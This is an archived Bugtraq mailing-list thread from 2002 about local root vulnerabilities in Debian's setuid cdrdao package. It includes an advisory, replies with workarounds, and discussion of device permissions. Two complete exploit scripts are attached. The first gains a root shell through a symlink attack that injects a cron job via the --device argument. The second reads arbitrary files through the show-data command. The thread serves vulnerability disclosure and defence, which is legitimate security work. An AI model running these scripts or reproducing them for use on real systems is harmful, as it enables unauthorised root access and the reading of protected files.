7804672 2002-01-13 00:09 +0100 /86 rader/ Jens Steube <jsteube@lastflood.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-14 21:09 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20508>
Ärende: cdrdao insecure filehandling
------------------------------------------------------------
From: Jens Steube <jsteube@lastflood.com>
To: bugtraq@securityfocus.com
Message-ID: <1010876960.3c40c220caef8@troja.dnsalias.org>
--[ Description ]--
There are several security-related Bugs in the distributed
Debian (SID) Package of CDRDAO, a program to write audio or mixed
mode CD-Rs in disk-at-once mode. /usr/bin/cdrdao is setuid-Root
by default.
--[ Version ]--
Name: Cdrdao
Version: 1.1.5
Autor: Andreas Mueller <andreas@daneb.de>
--[ Impact ]--
Local users can gain unauthorized root access to the system.
--[ Legal ]--
The information in this advisory may be distributed or
reproduced, provided that the advisory is not modified in any way.
The Autor makes no warranties of any kind to the information
contained in this security advisory.
--[ Bugs ]--
Cdrdao doesnt check for permissions when it trys to open a file
as its "toc-file". So it was possible to open all Files on the
System, but it skips the Output on its Error-Message. Maybe it is
possible to trick to read all these Files. As i tested around to
trick i found another Bug.
This more important Bug is that cdrdao can also write a
configfile which is written to "$HOME/.cdrdao". it is written by
the Root-User and not as the User who starts cdrdao. It is possible
to include data on the written configfile and so it is possible to
gain root via a symlink-attack on $HOME/.cdrdao
After i found these Bugs i stopped to search for more Bugs.
--[ Fix ]--
Not tried to fix.
The Autor, the Debian Package Maintainer and the Debian
Bugtracking System (#127930) where informed one week before
this Post, but there was no response.
--[ Tested on ]--
Debian GNU/Linux SID on i386, installed gcc and running cron
--[ Credits ]--
Found and exploited by Jens "atomi" Steube.
Greets go out to: impulse, symbiont, mot, para, sharkking, kartan
and all other friend on #altoetting and #perl.de on ircnet.
--[ Proof of concept exploit ]--
The attached exploit is designed for the Debian (SID) Package
and not tested on other Systems.
Regards,
Jens Steube
jsteube@lastflood.com
(7804672) /Jens Steube <jsteube@lastflood.com>/-----
Bilaga (application/octet-stream) i text 7804673
Kommentar i text 7814440 av Guillaume PELAT <guillaume.pelat@intexxia.com>
Kommentar i text 7815634 av Anthony DeRobertis <asd@suespammers.org>
7804673 2002-01-13 00:09 +0100 /62 rader/ Jens Steube <jsteube@lastflood.com>
Importerad: 2002-01-14 21:09 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20509>
Bilaga (text/plain) till text 7804672
Ärende: Bilaga till: cdrdao insecure filehandling
------------------------------------------------------------
#!/bin/bash
## cdrdaohack.sh by Jens "atomi" Steube
ROOTEXECDIR="/etc/cron.d/cdr"
CDRDAO="/usr/bin/cdrdao"
USERCONF="$HOME/.cdrdao"
echo "Testing $CDRDAO"
if [ ! -u $CDRDAO ]; then
echo "ERROR: $CDRDAO is not setuid or does not exist"
exit 1
fi
echo "Generating Helper Files"
cat > /tmp/daosh.c << EOF
int main () {
setuid(0); setgid(0);
unlink("/tmp/dao.sh");
unlink("/tmp/daosh.c");
unlink("/etc/cron.d/cdr");
unlink("$HOME/.cdrdao");
execl("/bin/bash","bash","-i",0);
}
EOF
cat > /tmp/dao.sh << EOF
cc -o /tmp/daosh /tmp/daosh.c >/dev/null 2>&1
chown root /tmp/daosh >/dev/null 2>&1
chgrp root /tmp/daosh >/dev/null 2>&1
chmod 6755 /tmp/daosh >/dev/null 2>&1
exit 0
EOF
chmod 700 /tmp/dao.sh
echo "Backing up original $USERCONF file to $USERCONF.orig"
mv $USERCONF $USERCONF.orig >/dev/null 2>&1
echo "Creating Symlink on $USERCONF to $ROOTEXECDIR"
ln -s $ROOTEXECDIR $USERCONF
echo "Executing $CDRDAO"
$CDRDAO write --save --device '
* * * * * root /tmp/dao.sh >/dev/null 2>&1
#' --buffers '
' . >/dev/null 2>&1
echo "Waiting for Rootshell, wait at least 3 minutes"
while [ ! -u /tmp/daosh ]; do
echo -n "."
sleep 1
done
echo
echo "Entering Rootshell and removing Helper Files"
echo "Have Phun :-)"
/tmp/daosh
(7804673) /Jens Steube <jsteube@lastflood.com>/-----
7814440 2002-01-15 10:45 +0100 /29 rader/ Guillaume PELAT <guillaume.pelat@intexxia.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-15 23:56 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20535>
Kommentar till text 7804672 av Jens Steube <jsteube@lastflood.com>
Ärende: Re: cdrdao insecure filehandling
------------------------------------------------------------
From: "Guillaume PELAT" <guillaume.pelat@intexxia.com>
To: <bugtraq@securityfocus.com>
Message-ID: <006501c19da9$688ed6f0$4d3e010a@intexxiaxh2dm7>
"Jens Steube" <jsteube@lastflood.com> wrote in message
news:1010876960.3c40c220caef8@troja.dnsalias.org...
> --[ Bugs ]--
>
> Cdrdao doesnt check for permissions when it trys to open a file
> as its "toc-file". So it was possible to open all Files on the
> System, but it skips the Output on its Error-Message. Maybe it is
> possible to trick to read all these Files.
I confirm it is possible to read all these files using show-data
command. A proof of concept script is attached.
--
Guillaume Pelat
Security Expert
INTEXXIA
171 Av. Georges Clemenceau
92024 NANTERRE CEDEX - FRANCE
tel: +33 1 55 69 49 10
fax: +33 1 55 69 78 80
http://www.intexxia.com
(7814440) /Guillaume PELAT <guillaume.pelat@intexxia.com>/(Ombruten)
Bilaga (application/octet-stream) i text 7814441
7814441 2002-01-15 10:45 +0100 /28 rader/ Guillaume PELAT <guillaume.pelat@intexxia.com>
Bilagans filnamn: "show_file.sh"
Importerad: 2002-01-15 23:56 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20536>
Bilaga (text/plain) till text 7814440
Ärende: Bilaga (show_file.sh) till: Re: cdrdao insecure filehandling
------------------------------------------------------------
#!/bin/sh
if [ "$1" ]; then
cat > /tmp/t.c <<EOF
#include <stdio.h>
int main()
{
int i;
while (fscanf(stdin, "%i", &i) > 0)
{
printf("%c%c", (i & 0xff00) >> 8, i & 0xff);
}
return 0;
}
EOF
cat > /tmp/t.toc <<EOF
CD_ROM
TRACK MODE1_RAW
FILE "$1" 0
EOF
gcc /tmp/t.c -o /tmp/show
echo `cdrdao show-data -v 0 --force /tmp/t.toc 2>&1 | grep -v WARNING | sed 's/.*://g' ` | /tmp/show
rm -f /tmp/t.c /tmp/show /tmp/t.toc
else
echo "Syntax: $0 filename"
fi
(7814441) /Guillaume PELAT <guillaume.pelat@intexxia.com>/
7815634 2002-01-15 07:12 -0500 /14 rader/ Anthony DeRobertis <asd@suespammers.org>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-16 08:31 av Brevbäraren
Extern mottagare: Jens Steube <jsteube@lastflood.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20549>
Kommentar till text 7804672 av Jens Steube <jsteube@lastflood.com>
Ärende: Re: cdrdao insecure filehandling
------------------------------------------------------------
From: "Anthony DeRobertis" <asd@suespammers.org>
To: Jens Steube <jsteube@lastflood.com>
Cc: bugtraq@securityfocus.com
Message-ID: <E16QSRj-0006F6-00@asd.ppp0.com>
A work around on debian is to:
dpkg-statoverride --update --add root root 0755 /usr/bin/cdrdao
This tells dpkg that cdrdao is not to be suid root anymore, at least
until you change or delete that override.
(7815634) /Anthony DeRobertis <asd@suespammers.org>/(Ombruten)
Bilaga (application/pgp-signature) i text 7815635
Kommentar i text 7823964 av martin f krafft <madduck@madduck.net>
7815635 2002-01-15 07:12 -0500 /10 rader/ Anthony DeRobertis <asd@suespammers.org>
Importerad: 2002-01-16 08:31 av Brevbäraren
Extern mottagare: Jens Steube <jsteube@lastflood.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20550>
Bilaga (text/plain) till text 7815634
Ärende: Bilaga till: Re: cdrdao insecure filehandling
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iEYEABECAAYFAjxEHJcACgkQi6CUbwPcQ8BsYgCfUS97NVQ2sT8BJ6nppDQGTEij
9h0Ani5TIm2/83YqLjOvExR/sIafRgMf
=UOBd
-----END PGP SIGNATURE-----
(7815635) /Anthony DeRobertis <asd@suespammers.org>/
7823964 2002-01-16 14:49 +0100 /29 rader/ martin f krafft <madduck@madduck.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-17 03:33 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20574>
Kommentar till text 7815634 av Anthony DeRobertis <asd@suespammers.org>
Ärende: Re: cdrdao insecure filehandling
------------------------------------------------------------
From: martin f krafft <madduck@madduck.net>
To: bugtraq@securityfocus.com
Message-ID: <20020116134913.GG16146@fishbowl.madduck.net>
also sprach Anthony DeRobertis <asd@suespammers.org> [2002.01.15.1312 +0100]:
> dpkg-statoverride --update --add root root 0755 /usr/bin/cdrdao
>
> This tells dpkg that cdrdao is not to be suid root anymore, at least until
> you change or delete that override.
but then you have to be root to burn CDs. there is a reason why cdrdao
is setuid - it needs access to root-owned device files like /dev/scd0
and /dev/sg0 (on Linux that is).
i believe the right solution is to create a new group just for that,
and chgrp these device files to that group. then cdrdao works
non-setuid, and you have user-level control over who should be able
to use the burner, and who shouldn't.
--
martin; (greetings from the heart of the sun.)
\____ echo mailto: !#^."<*>"|tr "<*> mailto:" net@madduck
"when I was a boy I was told
that anybody could become president.
now i'm beginning to believe it."
-- clarence darrow
(7823964) /martin f krafft <madduck@madduck.net>/(Ombruten)
Bilaga (application/pgp-signature) i text 7823965
Kommentar i text 7828788 av Luciano Miguel Ferreira Rocha <strange@nsk.yi.org>
Kommentar i text 7858909 av Pavel Kankovsky <peak@argo.troja.mff.cuni.cz>
7823965 2002-01-16 14:49 +0100 /10 rader/ martin f krafft <madduck@madduck.net>
Importerad: 2002-01-17 03:33 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20575>
Bilaga (text/plain) till text 7823964
Ärende: Bilaga till: Re: cdrdao insecure filehandling
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iEYEARECAAYFAjxFhNkACgkQIgvIgzMMSnWXTgCfS/UlpLlu5pe3KvYTsKQXJKzi
8cUAoOoGkXBWPOwax7C6/R+/DtePG6Rj
=Vf17
-----END PGP SIGNATURE-----
(7823965) /martin f krafft <madduck@madduck.net>/---
7828788 2002-01-17 01:22 +0000 /30 rader/ Luciano Miguel Ferreira Rocha <strange@nsk.yi.org>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-17 18:20 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: strange@nsk.yi.org
Mottagare: Bugtraq (import) <20580>
Kommentar till text 7823964 av martin f krafft <madduck@madduck.net>
Ärende: Re: cdrdao insecure filehandling
------------------------------------------------------------
From: Luciano Miguel Ferreira Rocha <strange@nsk.yi.org>
To: bugtraq@securityfocus.com
Message-ID: <20020117012228.A7440@nsk.yi.org>
On Wed, Jan 16, 2002 at 02:49:13PM +0100, martin f krafft wrote:
> but then you have to be root to burn CDs. there is a reason why cdrdao
> is setuid - it needs access to root-owned device files like /dev/scd0
> and /dev/sg0 (on Linux that is).
On RedHat's distribution, and I believe many others based on PAM, the
owner of those files (or any other so configured) is changed to the
user on the console when he loggs in.
The PAM module responsable for the change of permissions is
pam_console.so, and the file describing the permissions is
/etc/security/console.perms. Just see man pam_console for more
details.
Regards,
Luciano Rocha
PS: obviously, I don't know whether Debian uses PAM or not...
--
Luciano Rocha, strange@nsk.yi.org
The trouble with computers is that they do what you tell them, not
what you want.
-- D. Cohen
(7828788) /Luciano Miguel Ferreira Rocha <strange@nsk.yi.org>/(Ombruten)
7858909 2002-01-20 01:03 +0100 /25 rader/ Pavel Kankovsky <peak@argo.troja.mff.cuni.cz>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-22 06:13 av Brevbäraren
Extern mottagare: martin f krafft <madduck@madduck.net>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20618>
Kommentar till text 7823964 av martin f krafft <madduck@madduck.net>
Ärende: Re: cdrdao insecure filehandling
------------------------------------------------------------
From: "Pavel Kankovsky" <peak@argo.troja.mff.cuni.cz>
To: martin f krafft <madduck@madduck.net>
Cc: bugtraq@securityfocus.com
Message-ID: <20020120004712.AC6.0@bobanek.nowhere.cz>
On Wed, 16 Jan 2002, martin f krafft wrote:
> but then you have to be root to burn CDs. there is a reason why cdrdao
> is setuid - it needs access to root-owned device files like /dev/scd0
> and /dev/sg0 (on Linux that is).
>
> i believe the right solution is to create a new group just for that, and
> chgrp these device files to that group. then cdrdao works non-setuid,
> and you have user-level control over who should be able to use the
> burner, and who shouldn't.
AFAIK, Linux /dev/sgX makes it possible to send virtually any SCSI
command to the device without any serious sanity checking done by
the kernel. After all, G stands for generic. It is not a good idea to
give such a power directly into the hands of users.
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
(7858909) /Pavel Kankovsky <peak@argo.troja.mff.cuni.cz>/